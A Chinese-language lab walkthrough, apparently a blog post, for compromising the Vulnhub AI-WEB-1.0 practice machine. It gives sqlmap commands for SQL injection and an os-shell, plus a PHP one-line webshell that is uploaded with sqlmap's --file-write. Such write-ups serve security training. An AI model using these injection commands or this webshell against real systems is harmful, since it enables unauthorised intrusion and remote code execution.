【Vulnhub靶场AI-WEB-1.0打靶教程】

第一步:查看虚拟机的ip

第二步:扫描ip下开放的80端口

第三步:扫描查到的ip地址下的目录

第四步:访问查到的目录

访问robot.txt

第五步:访问robot.txt显示出的目录

第六步:打开kali终端,使用sqlmap功能

sqlmap -u "http://192.168.189.153/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" --dbs --batch

查到数据库名

进行os-shell连接

sqlmap -u "http://192.168.189.153/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" --os-shell

在kali里面/home/kali/目录下创建一个1.php写入一句话木马。语句如下:

php 复制代码
<?php @eval($_POST['pass']);?>

再打开一个终端页面输入命令

sqlmap -u "http://192.168.189.153/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write 1.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php

然后返回之前的终端页面输入命令ls查看目录,看到了木马文件上传成功

第七步:打卡蚁剑访问即可

相关推荐
qq_2739002316 分钟前
CentOS系统防火墙服务介绍
linux·运维·centos
小灰灰__1 小时前
Linux安装ffmpeg7.1操作说明
linux·运维·服务器
神经毒素1 小时前
WEB安全--RCE--webshell bypass
网络·安全·web安全
互联网搬砖老肖1 小时前
运维打铁:Centos 7 安装 redis_exporter 1.3.5
运维·redis·centos
BXCQ_xuan2 小时前
Typecho博客网站头部SEO优化完整指南
运维·服务器·数据库·php·web
鱼饼6号3 小时前
Jenkins Pipeline 构建 CI/CD 流程
linux·运维·服务器·ci/cd·容器·jenkins
国际云,接待4 小时前
[特殊字符]服务器性能优化:从硬件到AI的全栈调优指南
运维·服务器·人工智能·阿里云·性能优化·架构·云计算
阿巴~阿巴~4 小时前
云服务器 —— 公有 IP 与 私有 IP
运维·服务器·tcp/ip
ALe要立志成为web糕手4 小时前
第十六周蓝桥杯2025网络安全赛道
安全·web安全·网络安全·蓝桥杯
程序猿(雷霆之王)4 小时前
Linux——动静态库
linux·运维·服务器